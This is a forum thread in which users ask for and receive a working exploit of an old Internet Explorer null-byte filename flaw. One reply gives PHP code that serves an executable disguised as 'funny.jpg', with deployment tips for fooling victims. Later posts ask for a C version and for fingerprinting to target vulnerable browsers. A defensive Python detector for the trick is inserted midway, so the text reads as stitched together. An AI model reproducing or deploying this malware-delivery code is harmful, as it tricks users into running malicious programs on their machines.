Full Version: An Old Exploit
alibaba
Hi

The exploit that I want help for is an old one for which most browsers (Internet Explorer) are patched. But still I want to go ahead with this. With my very basic HTML knowledge I have not been able to make it work. The following link has an explanation of the exploit and a link to the demo. The demonstration is the proof of concept for the exploit. Can somebody decode it for me or guide me to code such an exploit?

Check for yourself: http://www.securiteam.com/windowsntfocus/5DP0D1F61A.html

Thanks.
ara2
QUOTE
The trick is simply to use a null byte in the filename. A malicious web server can set a filename like "README.TXT%%00PROG.EXE" via the Content-Disposition HTTP header. If this kind of filename is set for an attachment, IE will display just "README.TXT" in the download dialog (unless patched). Apparently "%%00" gets decoded and some of the string handling functions believe the filename string ends there. When opening the file (if the user chooses to "Open" it), though, the whole string is used and the program gets run.


So what you need to do is have access to a web server that can use some kind of scripting language to send HTTP headers. CGI/Perl/PHP are a few examples.

I'll explain it with PHP, as I think it's the most popular, and people aren't wary of .php web pages. I'm also assuming the server is Apache on Windows.

1- The user clicks on http://your.ip/index.php
2- Your web server executes the index.php script

CODE

<?php

// 'user preferences' ;)
$directory = 'c:/';        // folder with file to run
$virus     = 'virii.exe';  // file to run
$fakeName  = 'funny.jpg';  // what the user will see
$mime      = 'image/jpeg'; // file type description

// full path of the file to send
$filepath = $directory . $virus;

// make sure file exists
if ( !file_exists($filepath) ) die('no such file');

// prepare some info for the http header
$filename = $fakeName . '%%00' . $virus;
$fileSize = filesize($filepath);

// change the http header, to force a download prompt
header( "Content-Type: $mime", true );
header( "Content-Disposition: inline; filename=$filename; size=$fileSize;", true );

// send the file contents
$fh = fopen($filepath, 'rb') or die('Could not read file');
while ($data = fread($fh, 2048)) {
    print $data;
}
fclose($fh);

?>


3- The browser receives HTTP code that tells it it is about to download a file called funny.jpg%%00virii.exe. It displays to the user that the filename is funny.jpg.

4- If the user clicks 'Open', the file is downloaded and executed.

--

If you're even more evil, you can set up a directory called funny.jpg and have Apache load index.php by default instead of index.html.

Then you can send a link like http://ip/funny.jpg

*note* You don't need an actual and complete web server for that. You could do the same thing in C: code a listening socket that waits for an HTTP GET request and replies with the HTTP data generated by the index.php script I just posted. You can read RFCs, or use a packet sniffer or netcat, to find out how HTTP requests and answers are built.


Did I miss anything?
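As an added defensive check (not from the original post or the securiteam advisory), the following Python reproduces the mismatch the quoted advisory describes and flags a Content-Disposition header whose filename hides an executable behind an encoded null byte, the way a proxy or IDS rule could. The header samples are constructed; the doubled-percent handling follows the post's "%%00" spelling.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Extensions that Windows runs on "Open"; the post's payload uses .exe.
EXECUTABLE_EXTENSIONS = {"exe", "com", "bat", "cmd", "scr", "pif", "vbs", "js"}


def parse_filename(content_disposition: str) -> Optional[str]:
    """Return the raw (still percent-encoded) filename= value, or None."""
    m = re.search(r'filename\s*=\s*"?([^";]+)"?', content_disposition, re.I)
    return m.group(1).strip() if m else None


def analyse_filename(raw: str) -> dict:
    """Compare what a NUL-terminated string routine displays with what a
    length-aware routine uses: the mismatch the advisory describes."""
    # The post writes the byte as '%%00'; treat a doubled percent as one.
    decoded = unquote(raw.replace("%%", "%"))
    nul = decoded.find("\x00")
    displayed = decoded if nul < 0 else decoded[:nul]
    real_ext = decoded.rsplit(".", 1)[-1].lower() if "." in decoded else ""
    return {
        "displayed_name": displayed,
        "full_name": decoded,
        "embedded_nul": nul >= 0,
        "real_extension": real_ext,
        "suspicious": nul >= 0 and real_ext in EXECUTABLE_EXTENSIONS,
    }


def check_response(headers: dict) -> Optional[dict]:
    """Return the analysis when Content-Disposition hides an executable
    behind a NUL, otherwise None (nothing to alert on)."""
    cd = headers.get("Content-Disposition")
    raw = parse_filename(cd) if cd else None
    if raw is None:
        return None
    result = analyse_filename(raw)
    return result if result["suspicious"] else None


# Constructed sample responses (not captured traffic).
SAMPLE_MALICIOUS = {
    "Content-Type": "image/jpeg",
    "Content-Disposition": "inline; filename=funny.jpg%%00virii.exe; size=1234;",
}
SAMPLE_BENIGN = {
    "Content-Type": "image/jpeg",
    "Content-Disposition": 'inline; filename="funny.jpg"',
}
```

Run `check_response(SAMPLE_MALICIOUS)` to see the displayed name "funny.jpg" beside the full name ending in "virii.exe"; the benign sample returns None.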
alibaba
Thank you so much. I am on my way to test it.
sysadmin
Hello ara2,

I've tested it on my home network.

You wrote that it's possible to write the same in C code.
I'm not able to write something else in C. Do you have that code in C for me? Perhaps you could post it for me.

THX a lot.

Bye sysadmin

=k3Rn=
QUOTE
If you're even more evil, you can set up a directory called funny.jpg and have Apache load index.php by default instead of index.html.

Then you can send a link like http://ip/funny.jpg


Very interesting point!

---

It would be nice if you could write a script that checks the user's browser version and vulnerability and then decides what HTTP data to send, a funny pic or the malicious program. In both cases it would be nice if the user really gets shown a "funny.jpg" picture, you know what I mean.